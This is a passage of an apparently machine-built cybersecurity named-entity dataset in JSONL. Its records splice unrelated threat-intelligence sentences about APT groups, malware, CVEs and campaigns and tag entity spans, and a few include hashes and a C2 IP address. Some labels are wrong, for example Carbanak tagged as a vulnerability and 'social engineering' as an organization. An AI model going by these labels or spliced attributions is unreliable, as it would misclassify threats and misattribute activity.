The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": {"TOOL: PlugX": [[217, 222]], "TOOL: HTTPBrowser": [[230, 241]], "TOOL: RAT": [[244, 247]], "MALWARE: ShadowPad": [[373, 382]], "MALWARE: Winnti": [[387, 393]], "TOOL: C&C": [[455, 458]], "THREAT_ACTOR: Hack520": [[545, 552]]}, "info": {"id": "cyberner_stix_train_002727", "source": "cyberner_stix_train"}} {"text": "CyCon US is a collaborative effort between the Army Cyber Institute at the United States Military Academy and the NATO Cooperative Cyber Military Academy and the NATO Cooperative Cyber Defence Centre of Excellence .", "spans": {"ORGANIZATION: CyCon": [[0, 5]], "ORGANIZATION: Army Cyber Institute": [[47, 67]], "ORGANIZATION: United States Military Academy": [[75, 105]], "ORGANIZATION: NATO": [[114, 118], [162, 166]], "ORGANIZATION: Cooperative Cyber Military Academy": [[119, 153]], "ORGANIZATION: Cooperative Cyber Defence Centre of Excellence": [[167, 213]]}, "info": {"id": "cyberner_stix_train_002728", "source": "cyberner_stix_train"}} {"text": "The name Asacub appeared with version 4 in late 2015 ; previous versions were known as Trojan-SMS.AndroidOS.Smaps . The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations . The updates expanded scanner parameters and targets , looped execution of files via error messages , improved evasion techniques for scanning activities , and improved mining profits by killing off both the competition and their own previous miners . 
The use of zero - day vulnerabilities by ransomware groups like CL0P may trigger a significant shift in ransomware strategies , mirroring the adoption of the \" double extortion \" tactic in 2019 .", "spans": {"MALWARE: Asacub": [[9, 15]], "ORGANIZATION: CTU": [[173, 176]], "THREAT_ACTOR: TG-3390": [[203, 210]], "VULNERABILITY: zero - day vulnerabilities": [[654, 680]], "THREAT_ACTOR: ransomware groups": [[684, 701]], "THREAT_ACTOR: CL0P": [[707, 711]]}, "info": {"id": "cyberner_stix_train_002729", "source": "cyberner_stix_train"}} {"text": "You can check the status of Google Play Protect on your device : Open your Android device 's Google Play Store app . Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia . Threat actors accessed the source host via the hcdLoader RAT . The code is also very similar to the Metasploit version of the exploit , while the payload part of the shellcode has been written by the Miniduke authors re - using the backdoor ’s code .", "spans": {"SYSTEM: Google Play Protect": [[28, 47]], "SYSTEM: Google Play Store": [[93, 110]], "THREAT_ACTOR: PassCV": [[141, 147]], "MALWARE: hcdLoader": [[304, 313]], "THREAT_ACTOR: Miniduke authors": [[457, 473]]}, "info": {"id": "cyberner_stix_train_002730", "source": "cyberner_stix_train"}} {"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . 
This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"ORGANIZATION: diplomats": [[192, 201]], "ORGANIZATION: journalists": [[297, 308]]}, "info": {"id": "cyberner_stix_train_002731", "source": "cyberner_stix_train"}} {"text": "Their findings showed that Wolf is headquartered in Germany with offices in Cyprus , Bulgaria , Romania , India and ( possibly ) the U.S . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions . The malware displays a blank .PDF file or a decoy document related to the targeted attack . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": {"ORGANIZATION: SOC personnel": [[175, 188]]}, "info": {"id": "cyberner_stix_train_002732", "source": "cyberner_stix_train"}} {"text": "In a different period of the “ Agent Smith ” campaign , droppers and core modules used various combinations of the “ a * * * d ” and “ i * * * e ” domains for malicious operations such as prey list query , patch request and ads request . In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection . The scheduled tasks call msiexec.exe as a proxy to run the malicious code , much like how msiexec.exe was used during installation . 
Microsoft also issued emergency Exchange Server updates for the following vulnerabilities : The activity reported by Microsoft aligns with our observations .", "spans": {"MALWARE: Agent Smith": [[31, 42]], "FILEPATH: msiexec.exe": [[431, 442], [496, 507]], "ORGANIZATION: Microsoft": [[539, 548], [656, 665]], "SYSTEM: Exchange Server": [[571, 586]]}, "info": {"id": "cyberner_stix_train_002733", "source": "cyberner_stix_train"}} {"text": "We can observe below , the procedure through which the artifact attempts to establish a connection with the IP address 176.31.112.10 .", "spans": {"IP_ADDRESS: 176.31.112.10": [[119, 132]]}, "info": {"id": "cyberner_stix_train_002734", "source": "cyberner_stix_train"}} {"text": "The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack .", "spans": {"THREAT_ACTOR: crime gang": [[18, 28]], "VULNERABILITY: Carbanak": [[40, 48]], "ORGANIZATION: financial institutions": [[97, 119]], "THREAT_ACTOR: Turla": [[243, 248]]}, "info": {"id": "cyberner_stix_train_002735", "source": "cyberner_stix_train"}} {"text": "In the following image , we can see the function that parses the commands from the C & C server . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . 
In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network .", "spans": {"THREAT_ACTOR: Dukes": [[102, 107]], "THREAT_ACTOR: cyberespionage group": [[162, 182]], "ORGANIZATION: Kaspersky Lab": [[367, 380]], "FILEPATH: anomalous network traffic": [[425, 450]], "ORGANIZATION: government organization": [[456, 479]]}, "info": {"id": "cyberner_stix_train_002736", "source": "cyberner_stix_train"}} {"text": "The Trojan also employs various obfuscation methods : from the simplest , such as string concatenation and renaming of classes and methods , to implementing functions in native code and embedding SO libraries in C/C++ in the APK file , which requires the use of additional tools or dynamic analysis for deobfuscation , since most tools for static analysis of Android apps support only Dalvik bytecode . TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HTTPBrowser or PlugX . Also aware of the existing laws in Europe , they can avoid prosecution in certain countries as long as they avoid attacking them . The high similarity of the fake job recruitment campaigns both groups used to disguise their attacks , and the fact that Lazarus relied on similar versions of Rising Sun in activity tracked in 2017 , point to a connection between the two adversaries .", "spans": {"THREAT_ACTOR: TG-3390": [[403, 410]], "TOOL: ASPXTool web shells": [[454, 473]], "TOOL: HTTPBrowser": [[576, 587]], "TOOL: PlugX": [[591, 596]], "TOOL: Lazarus": [[851, 858]]}, "info": {"id": "cyberner_stix_train_002737", "source": "cyberner_stix_train"}} {"text": "] download . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . 
events.exe : b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 , c981273c32b581de824e1fd66a19a281 , GCC compiler in MinGW environment version 2.24, I386 Windows GUI EXE . Camouflaging itself as legitimate software , the executable is exceptionally large at 56 MB an unusual size for malware samples that may allow it to avoid detection as vendors typically avoid large file sizes .", "spans": {"ORGANIZATION: FireEye iSIGHT Intelligence": [[13, 40]], "THREAT_ACTOR: APT37": [[87, 92]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[105, 139]], "VULNERABILITY: CVE-2018-4878": [[142, 155]], "TOOL: DOGCALL malware": [[172, 187]], "FILEPATH: events.exe": [[214, 224]], "FILEPATH: b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31": [[227, 291]], "FILEPATH: c981273c32b581de824e1fd66a19a281": [[294, 326]], "TOOL: GCC": [[329, 332]], "TOOL: MinGW": [[345, 350]], "SYSTEM: Windows": [[382, 389]], "TOOL: GUI": [[390, 393]], "TOOL: EXE": [[394, 397]]}, "info": {"id": "cyberner_stix_train_002738", "source": "cyberner_stix_train"}} {"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . Where they exist , they often use grey market or pirated software .", "spans": {"THREAT_ACTOR: group": [[23, 28]], "TOOL: powershell-based malware": [[57, 81]], "ORGANIZATION: social engineering": [[93, 111]], "MALWARE: grey market": [[242, 253]], "MALWARE: pirated software": [[257, 273]]}, "info": {"id": "cyberner_stix_train_002739", "source": "cyberner_stix_train"}} {"text": "These kinds of threats will become more common , as more and more companies decide to publish their software directly to consumers . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . 
APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": {"THREAT_ACTOR: Machete": [[133, 140]], "TOOL: malware": [[233, 240]], "THREAT_ACTOR: APT37": [[288, 293]], "THREAT_ACTOR: Reaper": [[296, 302]], "ORGANIZATION: financial company": [[378, 395]]}, "info": {"id": "cyberner_stix_train_002740", "source": "cyberner_stix_train"}} {"text": "Previous work published by security vendor FireEye in October 2014 suggests APT28 might be of Russian origin . The Buckeye attack group had been active since at least 2009 , when it began mounting a string of espionage attacks , mainly against organizations based in the U.S .", "spans": {"ORGANIZATION: FireEye": [[43, 50]], "THREAT_ACTOR: APT28": [[76, 81]], "THREAT_ACTOR: Buckeye": [[115, 122]]}, "info": {"id": "cyberner_stix_train_002741", "source": "cyberner_stix_train"}} {"text": "] com www [ . More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power . The updates are significant for both of the longstanding malware families ; before this year , Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 . 
There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": {"ORGANIZATION: Arbor Networks": [[38, 52]], "MALWARE: Aumlib": [[302, 308]], "SYSTEM: a URL shortcut": [[506, 520]]}, "info": {"id": "cyberner_stix_train_002742", "source": "cyberner_stix_train"}} {"text": "The first campaign identifier , found in the sample compiled on the 5th , references alkavkaz.com , a domain associated with a Turkish website proclaiming to be the “ Chechan [sic] Informational Center ” .", "spans": {"DOMAIN: alkavkaz.com": [[85, 97]]}, "info": {"id": "cyberner_stix_train_002743", "source": "cyberner_stix_train"}} {"text": "If you haven't heard about it for some reason , I would recommend to read this detailed report by Group-IB , as this APT attacks not only Russian banks , but also banks in more than 25 countries . We believe that this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product .", "spans": {"ORGANIZATION: Group-IB": [[98, 106]], "ORGANIZATION: banks": [[146, 151], [163, 168]], "MALWARE: VAMP": [[238, 242]], "THREAT_ACTOR: APT-C-23": [[286, 294]]}, "info": {"id": "cyberner_stix_train_002744", "source": "cyberner_stix_train"}} {"text": "Analysis of the malware shows that it uses the common string obfuscation of character replacement ( Figure 7 ) : Figure 7 : Encoded Marcher Strings Figure 8 : Decoded Marcher Strings As noted , the application requests extensive permissions during installation ; Figure 9 shows the request to act as device administrator , a particular permission that should very rarely be granted to an app . 
CIA's malware includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk areas Brutal Kangaroo and to keep its malware infestations going . The group heavily leverages open-source tools and custom payloads for carrying out attacks .", "spans": {"MALWARE: Marcher": [[132, 139], [167, 174]], "THREAT_ACTOR: CIA's": [[394, 399]], "TOOL: Hammer Drill": [[498, 510]], "TOOL: Brutal Kangaroo": [[659, 674]]}, "info": {"id": "cyberner_stix_train_002745", "source": "cyberner_stix_train"}} {"text": "Unfortunately , we couldn’t identify the initial installer , but we established that the infection started from a malicious file named WFCUpdater.exe .", "spans": {"FILEPATH: WFCUpdater.exe": [[135, 149]]}, "info": {"id": "cyberner_stix_train_002746", "source": "cyberner_stix_train"}} {"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 . In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper .", "spans": {"THREAT_ACTOR: PLATINUM": [[14, 22]], "ORGANIZATION: Symantec": [[203, 211]]}, "info": {"id": "cyberner_stix_train_002747", "source": "cyberner_stix_train"}} {"text": "Bears in the Midst : Intrusion Into the Democratic National Committee .", "spans": {"ORGANIZATION: Democratic National Committee": [[40, 69]]}, "info": {"id": "cyberner_stix_train_002748", "source": "cyberner_stix_train"}} {"text": "One of the purposes of the exfiltration of the contact list is to use them to attack other victims using SMS as an initial vector . The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 . 
This check is performed to ensure that only one instance of the malware is running at a time . A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": {"THREAT_ACTOR: group": [[136, 141]], "THREAT_ACTOR: Seedworm": [[158, 166]], "THREAT_ACTOR: MuddyWater": [[173, 183]], "ORGANIZATION: CrowdStrike incident responders": [[536, 567]], "THREAT_ACTOR: attacker": [[696, 704]], "TOOL: Remote PowerShell": [[715, 732]]}, "info": {"id": "cyberner_stix_train_002749", "source": "cyberner_stix_train"}} {"text": "Once the file has been downloaded and executed , the new process will launch a legitimate executable , such as “ msiexec.exe ” , and inject code into it .", "spans": {"FILEPATH: msiexec.exe": [[113, 124]]}, "info": {"id": "cyberner_stix_train_002750", "source": "cyberner_stix_train"}} {"text": "Even when a false flag might also be a possibility , we consider this to be unlikely . The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 . We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past .", "spans": {"THREAT_ACTOR: BlackEnergy": [[135, 146]]}, "info": {"id": "cyberner_stix_train_002751", "source": "cyberner_stix_train"}} {"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . 
This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing .", "spans": {"MALWARE: Bemstour": [[0, 8]], "TOOL: DoublePulsar backdoor": [[62, 83]]}, "info": {"id": "cyberner_stix_train_002752", "source": "cyberner_stix_train"}} {"text": "The result immediately revealed signs of a suspicious cmd.exe process running as a child of the ACLIENT.EXE process .", "spans": {"FILEPATH: cmd.exe": [[54, 61]], "FILEPATH: ACLIENT.EXE": [[96, 107]]}, "info": {"id": "cyberner_stix_train_002753", "source": "cyberner_stix_train"}} {"text": "As reported in the CrowdStrike 2018 Global Threat Report , big game hunting was a trend that helped define the criminal threat landscape in 2018 . The latter was one of at least three law firms Butterfly has targeted over the past three years .", "spans": {"ORGANIZATION: law firms": [[184, 193]], "THREAT_ACTOR: Butterfly": [[194, 203]]}, "info": {"id": "cyberner_stix_train_002754", "source": "cyberner_stix_train"}} {"text": "Along with the executable , two binary files , inject.bin (malicious function code) and imain.bin (malicious control logic) , were deployed as the controller’s payload . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": {"MALWARE: binary files": [[32, 44]], "MALWARE: imain.bin": [[88, 97]], "THREAT_ACTOR: PROMETHIUM": [[170, 180]], "THREAT_ACTOR: NEODYMIUM": [[185, 194]], "VULNERABILITY: zero-day": [[207, 215]], "VULNERABILITY: exploit": [[216, 223]]}, "info": {"id": "cyberner_stix_train_002755", "source": "cyberner_stix_train"}} {"text": "Our analysis suggests that the four short numbers are associated with Russian financial institutions , presumably where a victim would be likely to have accounts . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . 
The malware is divided into a couple of layers — each layer downloads a new payload on a cloud provider to get the final RAT developed in python and that uses additional providers such as Twitter and ImgBB . The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": {"MALWARE: .rtf file": [[207, 216]], "VULNERABILITY: CVE-2017-0199": [[232, 245]], "TOOL: RAT": [[369, 372]], "TOOL: python": [[386, 392]], "TOOL: Twitter": [[436, 443]], "TOOL: ImgBB": [[448, 453]], "ORGANIZATION: government": [[460, 470]], "THREAT_ACTOR: Cl0p": [[534, 538]], "ORGANIZATION: several federal agencies": [[545, 569]], "THREAT_ACTOR: the gang": [[595, 603]]}, "info": {"id": "cyberner_stix_train_002756", "source": "cyberner_stix_train"}} {"text": "This isn’t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries .", "spans": {"MALWARE: it": [[26, 28]], "ORGANIZATION: privatized agencies": [[192, 211]], "ORGANIZATION: government contractors": [[216, 238]], "ORGANIZATION: enterprises": [[250, 261]], "ORGANIZATION: consumer electronics": [[269, 289]], "ORGANIZATION: computer": [[292, 300]], "ORGANIZATION: healthcare": [[303, 313]], "ORGANIZATION: financial industries": [[320, 340]]}, "info": {"id": "cyberner_stix_train_002757", "source": "cyberner_stix_train"}} {"text": "For enterprises , Trend Micro ’s Smart Protection Suites with XGen™ security , which support Mac systems , infuse high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint .", "spans": {"ORGANIZATION: Trend Micro ’s Smart Protection Suites": [[18, 56]], "ORGANIZATION: 
XGen™ security": [[62, 76]], "TOOL: Mac": [[93, 96]]}, "info": {"id": "cyberner_stix_train_002758", "source": "cyberner_stix_train"}} {"text": "On January 12 , 2016 , Cylance published a blog linking an exploit document to the group Mandiant refers to as APT2 and CrowdStrike as \" Putter Panda \" . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"ORGANIZATION: Cylance": [[23, 30]], "ORGANIZATION: Mandiant": [[89, 97]], "THREAT_ACTOR: APT2": [[111, 115]], "ORGANIZATION: CrowdStrike": [[120, 131]], "THREAT_ACTOR: Putter Panda": [[137, 149]], "THREAT_ACTOR: Attackers": [[154, 163]], "TOOL: C&C": [[212, 215]], "ORGANIZATION: oil": [[348, 351]], "ORGANIZATION: gas": [[354, 357]], "ORGANIZATION: petrochemical companies": [[364, 387]], "ORGANIZATION: executives": [[417, 427]]}, "info": {"id": "cyberner_stix_train_002759", "source": "cyberner_stix_train"}} {"text": "The imports reveal the use of a second DLL called \" eCommon.dll . Here , we investigate a campaign targeting an Asian government organization . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government .", "spans": {"ORGANIZATION: government organization": [[118, 141]], "ORGANIZATION: FireEye 's Advanced Practices": [[161, 190]], "THREAT_ACTOR: APT33": [[297, 302]]}, "info": {"id": "cyberner_stix_train_002760", "source": "cyberner_stix_train"}} {"text": "GolfSpy ’ s configurations encoded by a custom algorithm ( right ) and its decoded version ( left ) As shown in Figure 3 , GolfSpy ’ s configurations ( e.g. 
, C & C server , secret keys ) are encoded by a customized algorithm . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . The new builder inserts random values in the Author and Company metadata fields . Threat actors have been using this business model for a decade - plus , originally known as commodity malware .", "spans": {"MALWARE: GolfSpy": [[0, 7], [123, 130]], "THREAT_ACTOR: ScarCruft": [[228, 237]], "THREAT_ACTOR: Threat actors": [[470, 483]], "MALWARE: commodity malware": [[562, 579]]}, "info": {"id": "cyberner_stix_train_002761", "source": "cyberner_stix_train"}} {"text": "These requests rely on the end user accepting the permission changes and points to the importance of healthy skepticism when giving applications permissions . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . Like all of Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group .", "spans": {"THREAT_ACTOR: Emissary Panda": [[170, 184]], "VULNERABILITY: vulnerability": [[214, 227]], "VULNERABILITY: CVE-2019-0604": [[263, 276]], "THREAT_ACTOR: Gorgon Group": [[404, 416], [529, 541]], "MALWARE: infrastructure utilization": [[458, 484]], "MALWARE: standardization": [[489, 504]]}, "info": {"id": "cyberner_stix_train_002762", "source": "cyberner_stix_train"}} {"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . 
Turla is a notorious group that has been targeting diplomats .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: attackers": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]], "THREAT_ACTOR: Turla": [[197, 202]], "ORGANIZATION: diplomats": [[248, 257]]}, "info": {"id": "cyberner_stix_train_002763", "source": "cyberner_stix_train"}} {"text": "Two weeks ago , Some Chinese Security Researchers have also detected a bootkit called 'Oldboot ' , possibly the same malware or another variant of it . The fieldwork generated extensive data that allowed us to examine Tibetan information security practices , as well as capture real-time evidence of malware that had penetrated Tibetan computer systems . APT1 uses some tools and techniques that we have not yet observed being used by other groups including two utilities designed to steal email — GETMAIL and MAPIGET . The code is also very similar to the Metasploit version of the exploit , while the payload part of the shellcode has been written by the Miniduke authors re - using the backdoor ’s code .", "spans": {"ORGANIZATION: Tibetan information security practices": [[218, 256]], "ORGANIZATION: Tibetan": [[328, 335]], "THREAT_ACTOR: APT1": [[355, 359]], "TOOL: email": [[490, 495]], "MALWARE: GETMAIL": [[498, 505]], "MALWARE: MAPIGET": [[510, 517]], "THREAT_ACTOR: Miniduke authors": [[657, 673]]}, "info": {"id": "cyberner_stix_train_002764", "source": "cyberner_stix_train"}} {"text": "Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin .", "spans": {"ORGANIZATION: FireEye": [[43, 50]]}, "info": {"id": "cyberner_stix_train_002765", "source": "cyberner_stix_train"}} {"text": "A screenshot of the file is depicted below .", "spans": {}, "info": {"id": "cyberner_stix_train_002767", "source": "cyberner_stix_train"}} {"text": "Upon execution , it will communicate with an attacker-controller website to 
download a variant of the Pony malware , pm.dll” along with a standard Vawtrak trojan . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": {"MALWARE: Pony malware": [[102, 114]], "MALWARE: pm.dll”": [[117, 124]], "MALWARE: Corkow": [[189, 195]]}, "info": {"id": "cyberner_stix_train_002768", "source": "cyberner_stix_train"}} {"text": "Quasar is a .NET Framework assembly , loading multiple DLLs upon launch , for example “ dnsapi.dll ” .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: .NET Framework": [[12, 26]], "FILEPATH: dnsapi.dll": [[88, 98]]}, "info": {"id": "cyberner_stix_train_002769", "source": "cyberner_stix_train"}} {"text": "] today svcws [ . A new version of ShimRat was built on the 7th of September , uploaded to the server and only days later used in a new campaign . The network traffic is encoded with a custom Base64 alphabet . For our Managed Defense Customers , we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity .", "spans": {"TOOL: ShimRat": [[35, 42]], "ORGANIZATION: Managed Defense Customers": [[218, 243]], "THREAT_ACTOR: threat actor": [[335, 347]]}, "info": {"id": "cyberner_stix_train_002770", "source": "cyberner_stix_train"}} {"text": "Perform penetration testing on web services .", "spans": {"TOOL: web services": [[31, 43]]}, "info": {"id": "cyberner_stix_train_002771", "source": "cyberner_stix_train"}} {"text": "In part one of this research , we analyze the Spark campaign .", "spans": {"MALWARE: Spark": [[46, 51]]}, "info": {"id": "cyberner_stix_train_002772", "source": "cyberner_stix_train"}} {"text": "Typically , it is a message saying that the user has received a money transfer , and that they must enter their bank card details so the money can be transferred to their account . 
The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable . On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties .", "spans": {"TOOL: self-extracting RAR": [[185, 204]], "MALWARE: Loader.dll": [[266, 276]], "MALWARE: readme.txt": [[294, 304]], "ORGANIZATION: Proofpoint": [[401, 411]], "TOOL: emails": [[447, 453]], "ORGANIZATION: shipbuilding company": [[485, 505]], "ORGANIZATION: military": [[547, 555]]}, "info": {"id": "cyberner_stix_train_002773", "source": "cyberner_stix_train"}} {"text": "Require two-factor authentication for all remote access solutions , including OWA .", "spans": {"TOOL: OWA": [[78, 81]]}, "info": {"id": "cyberner_stix_train_002774", "source": "cyberner_stix_train"}} {"text": "] coupload202 [ . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 . When a person types “ google.com ” into a web browser , a DNS translation to an IP address occurs so that the person ’s computer can communicate with Google . This type of attack technique can not be easily mitigated with preventive controls since it is based on the abuse of system features .", "spans": {"ORGANIZATION: activists": [[178, 187]], "DOMAIN: google.com": [[237, 247]], "ORGANIZATION: Google": [[365, 371]]}, "info": {"id": "cyberner_stix_train_002775", "source": "cyberner_stix_train"}} {"text": "Thanks to the video , we were even able to identify three further apps that contained adware functionality and were available on Google Play . 
Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide . In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 .", "spans": {"SYSTEM: Google Play": [[129, 140]], "MALWARE: Ploutus-D": [[149, 158], [231, 240]], "ORGANIZATION: ATM vendors": [[282, 293]], "MALWARE: Bankshot": [[363, 371]]}, "info": {"id": "cyberner_stix_train_002776", "source": "cyberner_stix_train"}} {"text": "This new wave also presents unique attack vectors based on the kind of device it has accessed . The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March . Glimpse : 6e86c57385d26a59c0df1580454b9967 . In terms of the fallout , it ’s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": {"THREAT_ACTOR: admin@338": [[168, 177]], "ORGANIZATION: think tank": [[227, 237]], "MALWARE: Glimpse": [[254, 261]], "FILEPATH: 6e86c57385d26a59c0df1580454b9967": [[264, 296]], "THREAT_ACTOR: Cl0p": [[360, 364]], "VULNERABILITY: zero - day": [[397, 407]]}, "info": {"id": "cyberner_stix_train_002777", "source": "cyberner_stix_train"}} {"text": "At DNC , COZY BEAR intrusion has been identified going back to summer of 2015 , while FANCY BEAR separately breached the network in April 2016 .", "spans": {"ORGANIZATION: DNC": [[3, 6]], "THREAT_ACTOR: COZY BEAR": [[9, 18]], "THREAT_ACTOR: FANCY BEAR": [[86, 96]]}, "info": {"id": "cyberner_stix_train_002778", "source": "cyberner_stix_train"}} {"text": "Hosting mostly was provided at Fast Serv Inc and resellers , in all likelihood related to bitcoin payment processing .", "spans": {}, "info": {"id": "cyberner_stix_train_002779", "source": "cyberner_stix_train"}} {"text": "At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs 
: the cpg Corporation . Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain .", "spans": {"ORGANIZATION: cpg Corporation": [[125, 140]]}, "info": {"id": "cyberner_stix_train_002780", "source": "cyberner_stix_train"}} {"text": "An examination of the hillaryclinton.com DNS records shows that the domain's MX records , which indicate the mail server used by the domain , point to aspmx.l.google.com , the mail server used by Google Apps .", "spans": {"DOMAIN: hillaryclinton.com": [[22, 40]], "TOOL: MX": [[77, 79]], "DOMAIN: aspmx.l.google.com": [[151, 169]], "ORGANIZATION: Google": [[196, 202]]}, "info": {"id": "cyberner_stix_train_002781", "source": "cyberner_stix_train"}} {"text": "Suckfly 's targets are displayed in figure 2 by their industry , which provides a clearer view of the group ’s operations .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_002782", "source": "cyberner_stix_train"}} {"text": "We believe that , when it is officially released , it will most likely be uploaded to rogue APK stores and other shady websites , while masquerading as real applications . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": {"MALWARE: files": [[176, 181]], "VULNERABILITY: Microsoft Office vulnerability": [[205, 235]], "VULNERABILITY: CVE-2012-0158": [[238, 251]], "THREAT_ACTOR: APT threat actors": [[331, 348]], "ORGANIZATION: diplomat": [[399, 407]]}, "info": {"id": "cyberner_stix_train_002783", "source": "cyberner_stix_train"}} {"text": "The culprit FLV file is embedded within AS3 in two chunks , and is reassembled at runtime .", "spans": {"TOOL: FLV": [[12, 15]]}, "info": {"id": "cyberner_stix_train_002784", "source": "cyberner_stix_train"}} {"text": "Also , command communications with the malware are parsed with a function named “ chuli ( ) ” prior to POSTing stolen data to the command-and-control server . Execute a command through exploits for CVE-2017-11882 . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"VULNERABILITY: CVE-2017-11882": [[198, 212]], "THREAT_ACTOR: BlackOasis": [[275, 285]], "ORGANIZATION: Kaspersky": [[288, 297]], "TOOL: Adobe Flash Player": [[331, 349]], "VULNERABILITY: zero-day": [[350, 358]], "VULNERABILITY: CVE-2016-4117": [[375, 388]], "MALWARE: FinSpy": [[435, 441]]}, "info": {"id": "cyberner_stix_train_002785", "source": "cyberner_stix_train"}} {"text": "One of these , called Marcher ( aka Exobot ) , seems to be especially active with different samples appearing on a daily basis . PLEAD uses spear-phishing emails to deliver and install their backdoor , either as an attachment or through links to cloud storage services . After that , the count for each port starts declining sharply . 
